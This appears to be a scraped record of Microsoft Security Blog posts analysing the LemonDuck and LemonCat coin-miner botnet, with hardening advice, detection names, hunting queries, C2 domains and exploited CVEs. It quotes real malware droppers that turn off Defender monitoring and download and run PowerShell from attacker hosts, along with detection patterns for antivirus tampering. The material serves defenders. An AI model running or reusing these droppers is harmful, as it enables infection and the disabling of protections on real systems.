In enterprise environments, PUA protection can stop adware, torrent downloaders, and coin miners.\n * Turn on [tamper protection features](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>) to prevent attackers from stopping security services.\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/enable-cloud-protection-microsoft-defender-antivirus>) and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.\n * Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. [Turn on network protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/enable-network-protection>) to block connections to malicious domains and IP addresses.\n * Check your [Office 365 antispam policy](<https://docs.microsoft.com/microsoft-365/security/office-365-security/configure-your-spam-filter-policies>) and your [mail flow rules](<https://docs.microsoft.com/microsoft-365/security/office-365-security/create-safe-sender-lists-in-office-365#recommended-use-mail-flow-rules>) for allowed senders, domains and IP addresses. [Apply extra caution](<https://docs.microsoft.com/exchange/troubleshoot/antispam/cautions-against-bypassing-spam-filters>) when using these settings to bypass antispam filters, even if the allowed sender addresses are associated with trusted organizations\u2014Office 365 will honor these settings and can let potentially harmful messages pass through. 
[Review system overrides in threat explorer](<https://docs.microsoft.com/microsoft-365/security/office-365-security/threat-explorer#system-overrides>) to determine why attack messages have reached recipient mailboxes.\n\n### Attack surface reduction\n\nTurn on the following attack surface reduction rules, to block or audit activity associated with this threat:\n\n * [Block executable content from email client and webmail](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-content-from-email-client-and-webmail>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block all office applications from creating child processes](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block persistence through WMI event 
subscription](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-persistence-through-wmi-event-subscription>)\n * [Block process creations originating from PSExec and WMI commands](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n\n### Antivirus detections\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * TrojanDownloader:PowerShell/LemonDuck!MSR\n * TrojanDownloader:Linux/LemonDuck.G!MSR\n * Trojan:Win32/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.B\n * Trojan:PowerShell/LemonDuck.C\n * Trojan:PowerShell/LemonDuck.D\n * Trojan:PowerShell/LemonDuck.E\n * Trojan:PowerShell/LemonDuck.F\n * Trojan:PowerShell/LemonDuck.G\n * TrojanDownloader:PowerShell/LodPey.A\n * TrojanDownloader:PowerShell/LodPey.B\n * Trojan:PowerShell/Amynex.A\n * Trojan:Win32/Amynex.A\n\n### Endpoint detection and response (EDR) alerts\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * LemonDuck botnet C2 domain activity\n * LemonDuck malware\n\nThe following alerts might also indicate threat activity associated with this threat. 
These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * Suspicious PowerShell command line\n * Suspicious remote activity\n * Suspicious service registration\n * Suspicious Security Software Discovery\n * Suspicious System Network Configuration Discovery\n * Suspicious sequence of exploration activities\n * Suspicious Process Discovery\n * Suspicious System Owner/User Discovery\n * Suspicious System Network Connections Discovery\n * Suspicious Task Scheduler activity\n * Suspicious Microsoft Defender Antivirus exclusion\n * Suspicious behavior by cmd.exe was observed\n * Suspicious remote PowerShell execution\n * Suspicious behavior by svchost.exe was observed\n * A WMI event filter was bound to a suspicious event consumer\n * Attempt to hide use of dual-purpose tool\n * System executable renamed and launched\n * Microsoft Defender Antivirus protection turned off\n * Anomaly detected in ASEP registry\n * A script with suspicious content was observed\n * An obfuscated command line sequence was identified\n * A process was injected with potentially malicious code\n * A malicious PowerShell Cmdlet was invoked on the machine\n * Suspected credential theft activity\n * Outbound connection to non-standard port\n * Sensitive credential memory read\n\n### Advanced hunting\n\nThe LemonDuck botnet is highly varied in its payloads and delivery methods after email distribution, so it can sometimes evade alerts. You can use the advanced hunting capability in Microsoft 365 Defender and Microsoft Defender for Endpoint to surface activities associated with this threat.\n\n**NOTE:** The following sample queries let you search for a week's worth of events. 
To explore up to 30 days worth of raw data to inspect events in your network and locate potential Lemon Duck-related indicators for more than a week, go to the **Advanced Hunting** page > **Query** tab, select the calendar drop-down menu to update your query to hunt for the **Last 30 days**.\n\n**LemonDuck template subject lines**\n\nLooks for subject lines that are present from 2020 to 2021 in dropped scripts that attach malicious LemonDuck samples to emails and mail it to contacts of the mailboxes on impacted machines. Additionally, checks if Attachments are present in the mailbox. General attachment types to check for at present are .DOC, .ZIP or .JS, though this could be subject to change as well as the subjects themselves. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2RQUvDQBCF31nwP-ytCnroUUElxEoEUUirxWOiXRuNicSkpeCP99vJepESZnYz8-a9mdmZPlWoUq2ZNlqpUa9vHepAP3Laak2sw5zmGlTqnfsLGEdNgz_SRAtDOc4OTM-fUyuPT_WgJ93qWqea6gzsCfY_6mBKqdiYypcpVHRVRxVPzmmpjLqRIVOiO_Qy4gk8gW1ONtezzo0_x-7JOcvleiQfasNkE7gWuolcS_otbKI-zuHRH_QR82-ot3olXmpHfox6asJetlhtndbcer6wrxFTcmvhWdmmvG35rz7srGLTLvodyAF82FyHWmC5Ane89y0SUyroc837ja-WGkNjk1zqAj_VLyyp2szeAQAA&runQuery=true&timeRangeId=week>)\n\n`EmailEvents \n| where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS', \n'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?') \n| where AttachmentCount >= 1`\n\n**LemonDuck Botnet Registration Functions**\n\nLooks for instances of function runs with name \u201cSIEX\u201d, which within the Lemon Duck initializing scripts is used to assign a specific user-agent for reporting back to command-and-control infrastructure with. This query should be accompanied by additional surrounding logs showing successful downloads from component sites. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2PuwrCQBRETy34D4ufIViID7ATYmFhE9yAAV9oMIgm3-7ZLQRBhvtgmJm7O6fiQc3euXCrONNwZ8iAN4GWg9zNCkxVNWovajY8uWZ2IgIj1vJt1hbZcxQzuZModUQ1_1OjqL_Jpb6le0qIviRd6O3pxoud_Tc1MePcC1b-YZv3zvoA7T5fgtwAAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceEvents \n| where ActionType == \"PowerShellCommand\" \n| where AdditionalFields =~ \"{\\\"Command\\\":\\\"SIEX\\\"}\"`\n\n**LemonDuck keyword identification**\n\nLooks for simple usage of observed LemonDuck keyword variations initiated by PowerShell processes. All results should reflect Lemon_Duck behavior; however, there are existing variants of Lemon_Duck that might not use this term explicitly, so validate with additional hunting queries based on known TTPs. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJ2NQQrCMBBF_1rwDqErBfEGrqyCUKQ3kKLFBpsojdoKHt7nbESX8pnM8P7MT65ad3nt6aU6nW1KaAWvFXVlHmukp5x6NbCOctrgeVyvyt6o40_CGtoyb9kIdrNATpkubPWWlCyxRXP6QGV__rZkDqjCO6iwnfdlA0naGX9oQn4BD2xHaK4bCSfo7Mv58Klezaq6iiQBAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_any(\"Lemon_Duck\",\"LemonDuck\")`\n\n**LemonDuck Microsoft Defender tampering**\n\nLooks for a command line event where LemonDuck or other similar malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWRzQqCQBSFzzroHcRVgT1EpIugIKp9mFoappL9LXr4vhkNrJUQl5m53jPnnOsdX4nuyhRxrnRRabOaCKgnKnQldzTUQC_Oh1KqF5ajOWgGnim0e6Hjj8aM_EyEYLEW9o5hplRq7dhzwtFIrjYgV020VGVVEh1ap8LqufK46cpHpYa5h5lozTIqxv9MvsSx6aqE2_T0YU7pIe7hEOjJd64bPpnV-_4rV-PORCqLncAiXJ1eE_D-mJ7h-p1Xm4OZ2radQI1aSFbpDTwRAUzcAQAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Antivirus uninstallation attempts**\n\nLooks for a command line event where LemonDuck or other similar malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEALWQzUrEQBCE6yz4DiEnF0SfwIP4A6IsguBVQja4wyaTMBN_FsRn97M2u6LeBBl6plPdVV2dczV6VlDNe6uk3lnmXIA3ihrJ97WnNxV60RIsEYWuqAWqQZXvqMcfCpegLfmcjs6cE71zl-h0nnkE-kqUf5xwRt5xKmoL3bjnk7kEyXrgbjkH6A_mLfQEd_w2p9QhEXceW1RWO7yeNAqY0foZ_gbbdByD9a6MVqw8IfjvlZr922ZRa292bWSwdrbz9eSswkNlv1_fw5Rn-mp2SvaxZTTGt_2n3inonkj05gmf4y1R6akXuvulNNMH1HgRaFYCAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName =~ \"wmic.exe\" \n| where InitiatingProcessCommandLine has_all(\"product where\",\"name like\",\"call uninstall\",\"/nointeractive\") \n| where InitiatingProcessCommandLine has_any(\"Kaspersky\",\"avast\",\"avp\",\"security\",\"eset\",\"AntiVirus\",\"Norton Security\")`\n\n**Known LemonDuck component script installations**\n\nLooks for instances of the callback actions which attempt to obfuscate detection while downloading supporting scripts such as those that enable the \u201cKiller\u201d and \u201cInfection\u201d functions for the malware as well as the mining components and potential secondary functions. Options for more specific instances included to account for environments with potential false positives. Most general versions are intended to account for minor script or component changes such as changing to utilize non .bin files, and non-common components. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAN2QzWrCUBCFz1roO1xctSC60p2rVlEQ8Q0kJrYJJlGS-Ac-vN8dA9rgwm3LMHcm58zPmXxprYMShcSFCm0tK7ER-Fq5KvI3tXSR01ExWIE7TeES2ESBvbl-GhPGoCn5nIrMenyV07va2lF3tFmlzUyxLvGEt9XBQ3qiB-zjqYpXdHySZ1gAF2lmNb43Bim15PXbvaoePQ4uhNuSVcw513oiU5xTvwdNNaxxr7LfqEmJAV-RaQpq9qZjR3_Fjoltj-0yB1Pw-gv__j2e62pluu7X_Z_bNsy83-eRRN8NJNPg1z-4At8RQUloAwAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName in (\"powershell.exe\",\"cmd.exe\") \n| where InitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\".bin\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\"kr.bin\",\"if.bin\",\"m6.bin\")`\n\n**LemonDuck named scheduled creation**\n\nLooks for instances where LemonDuck creates statically named scheduled tasks, or for a semi-unique pattern of task creation that LemonDuck also utilizes: launching hidden PowerShell processes in conjunction with randomly generated task names. An example of a randomly generated one is: "schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn fs5yDs9ArkV\\2IVLzNXfZV/F /tr "powershell -w hidden -c PS_CMD". 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWS0WrCQBBF77PgPyx5UrD6BX3S-mRLwQ8o2ygoGpXdtGlB_PaenSQlFV-kLLO53Jmde3eyM631qa1yvq8KOhqKrCf4tQ4qwX31dJZTpQ1cIJzmnNqDXuRVGPOoC3tGfU5dCR-1I8Zkv4jsZp-_qlNwwfIor7RA42BVG-s2oMeE2nTSo5B6Dv_d9c3476Z7CXZ6526e8zuQB-_Jja7yH-bAX2WCTcybM4duYE8O73WUNG_dt9YKqNc44jxarvjNpj_Q4gKlrsMWzztsaPCJ2spmGG2WyYPTA1xytsXpyt5E4nKb8hKvUz1rZvf9AWK9PVhOAgAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where FileName =~ \"schtasks.exe\" \n| where ProcessCommandLine has(\"/create\") \n| where ProcessCommandLine has_any(\"/tn blackball\",\"/tn blutea\",\"/tn rtsa\") or \nProcessCommandLine has_all(\"/create\",\"/ru\",\"system\",\"/sc\",\"/mo\",\"/tn\",\"/F\",\"/tr\",\"powershell -w hidden -c PS_CMD\")`\n\n**Competition killer script scheduled task execution**\n\nLooks for instances of the LemonDuck component KR.Bin, which is intended to kill competition prior to making the installation and persistence of the malware concrete. The killer script used is based off historical versions from 2018 and earlier, which has grown over time to include scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper maximum in this query can be modified and adjusted to include time bounding. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJWRT0_CQBDF35nE79D0BAkRDhw4oBeqCQbUxD_XBguxhlpMW8EaP7y_HQppiATMZmZnZt_MvLwNNNdKb4q475VpaVHOuaI-V6qC-EwN_cjTWjG1DPP20EPid86UjpnGTEwNFVPJFeITTlM-WUS1sPoCOwf3hflqYx0FxAlW1GqPut3F1_jWjlGuz2pvxs5v2-myBVHIq5vTPIlri84XlfigpskIxHaX41mYJrMKteX5zMTEmLj9F5jjk-FLWCTW8woyhsuGU3gip7-U_8-E-g-ksHE_MOHOyTeKPtDnuJZVfme8I2Pt6YZ4hXl60gdzp7V_WaKyf4DjYXUuTZ-euqbSMS0Hhu6D_gUG3Q8GqgIAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where ProcessCommandLine has_all(\"schtasks.exe\",\"/Delete\",\"/TN\",\"/F\") \n| summarize make_set(ProcessCommandLine) by DeviceId \n| extend DeleteVolume = array_length(set_ProcessCommandLine) \n| where set_ProcessCommandLine has_any(\"Mysa\",\"Sorry\",\"Oracle Java Update\",\"ok\") \n| where DeleteVolume >= 40 and DeleteVolume <= 80`\n\n**LemonDuck hosts file adjustment for dynamic C2 downloads**\n\nLooks for a PowerShell event wherein LemonDuck will attempt to simultaneously retrieve the IP address of a C2 and modify the hosts file with the retrieved address. The address is then attributed to a name that does not exist and is randomly generated. The script then instructs the machine to download data from the address. This query has a more general and more specific version, allowing the detection of this technique if other activity groups were to utilize it. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAMWQuwrCYAyFzyz4DqWTgvgGDmK9gYigu5S22IK20op18OH9Erro4OAiIZc_OTknbaRMdxVKyDvVqrxqsDn9TKVu1H319FSgVjm9Gg-0ZlYwLRR7LHX6YFjQPVNvQVx8Z4IFCnUF1TpT44xnbEx-4OGPajPqCxYzS7VxjG3mdBodiaYygH9J_6YV-IY8BZ26irFYDDXCDZN0dd5hbTaE0y6s2PnHXWv432cHNvZs1J3-9_vtHfn_L9Gt0E952_Wxf90Lt1_r6hICAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"etc\",\"hosts\") \nor InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"IPAddressToString\",\"etc\",\"hosts\",\"DownloadData\")`\n\n \n\n[Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>).\n\n \n\nThe post [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T19:00:59", "type": "mmpc", "title": "When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-29T19:00:59", "id": "MMPC:4A6B394DCAF12E05136AE087248E228C", "href": "https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-30T00:39:50", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. [Part 2](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) is a deep dive on the attacker behavior and will provide investigation guidance.] _\n\nCombating and preventing today's threats to enterprises require comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines\u2014even so-called commodity malware\u2014can bring in more dangerous threats. We\u2019ve seen this in banking Trojans serving as entry point for ransomware and hands-on-keyboard attacks. LemonDuck, an actively updated and robust malware that\u2019s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. 
Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck\u2019s threat to enterprises is also in the fact that it\u2019s a cross-platform threat. It\u2019s one of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms\u2014phishing emails, exploits, USB devices, brute force, among others\u2014and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched [Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) to gain access to outdated systems.\n\nThis threat, however, does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.\n\nIn the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.\n\n\n\n_Figure 1. 
Global distribution of LemonDuck botnet activity_\n\nIn 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still utilizes C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.\n\nIn-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.\n\n## LemonDuck and LemonCat infrastructure\n\nThe earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemonDuck campaigns today.\n\nLemonDuck is named after the variable \u201cLemon_Duck\u201d in one of the said PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. 
The format used two sets of alphabetical characters separated by dashes, for example: \u201cUser-Agent: Lemon-Duck-[A-Z]-[A-Z]\u201d. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in attacks as recently as June 2021.\n\nLemonDuck frequently utilizes open-source material built off of resources also used by other botnets, so there are many components of this threat that would seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.\n\nThe first, which we call the \u201cDuck\u201d infrastructure, uses historical infrastructures discussed in this report. It is highly consistent in running campaigns and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, and is more likely to have random display names for its C2 sites, and is always observed utilizing \u201cLemon_Duck\u201d explicitly in script.\n\nThe second infrastructure, which we call \u201cCat\u201d infrastructure\u2014for primarily using two domains with the word \u201ccat\u201d in them (_sqlnetcat[.]com_, _netcatkit[.]com_)\u2014emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery. 
It is often seen delivering the malware Ramnit.\n\n \n\n**Sample Duck domains** | **Sample Cat domains** \n---|--- \n \n * cdnimages[.]xyz\n * bb3u9[.]com\n * zz3r0[.]com\n * pp6r1[.]com\n * amynx[.]com\n * ackng[.]com\n * hwqloan[.]com\n * js88[.]ag\n * zer9g[.]com\n * b69kq[.]com\n| \n\n * sqlnetcat[.]com\n * netcatkit[.]com\n * down[.]sqlnetcat[.]com\n\n \n \nThe Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as \u201cblackball\u201d. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.\n\nThe fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, its core functionality mirrors non-monetized software, making any botnet infection worthy of prioritization.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## Initial access\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.\n\nLemonDuck acts as a loader for many other follow-on activities, but one of its main functions is to spread by compromising other systems. 
Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).\n\nOnce inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.\n\nBecause of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don\u2019t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.\n\nFrom mid-2020 to March 2021, LemonDuck\u2019s email subjects and body content have remained static, as have the attachment names and formats. 
These attachment names and formats have changed very little from similar campaigns that occurred in early 2020.\n\n \n\n**Sample email subjects ** | **Sample email body content** \n---|--- \n \n * The Truth of COVID-19\n * COVID-19 nCov Special info WHO\n * HALTH ADVISORY:CORONA VIRUS\n * WTF\n * What the fcuk\n * good bye\n * farewell letter\n * broken file\n * This is your order?\n| \n\n * Virus actually comes from United States of America\n * very important infomation for Covid-19\n * see attached document for your action and discretion.\n * the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.\n * what's wrong with you?are you out of your mind!!!!!\n * are you out of your mind!!!!!what 's wrong with you?\n * good bye, keep in touch\n * can you help me to fix the file,i can't read it\n * file is brokened, i can't open it \n \nThe attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named \u201creadme\u201d. Occasionally, all three types are present in the same email.\n\n\n\n_Figure 3. Sample email_\n\nWhile the JavaScript is detected by many security vendors, it might be classified with generic detection names. It could be valuable for organizations to sanitize JavaScript or VBScript executing or calling prompts (such as PowerShell) directly from mail downloads through solutions such as [custom detection rules](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/custom-detection-rules?view=o365-worldwide>).\n\nSince LemonDuck began operating, the .zip to .js file execution method is the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development. 
Below is a comparison of changes from the most recent iterations of the email-delivered downloads and those from April of 2020.\n\n \n\n**April 2020 PowerShell script** | **March 2021 PowerShell script** \n---|--- \n`var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden -c \\\"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\\\Microsoft\\\\Windows\\\\DiskCleanup\\\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo \n//This File is broken.` | `var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')\";cmd.run(cmdstr,0,1); \n//This File is broken.` \n \n \n\nAfter the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.\n\nOther common methods of infection include movement within the compromised environment, as well as through USB and connected drives. 
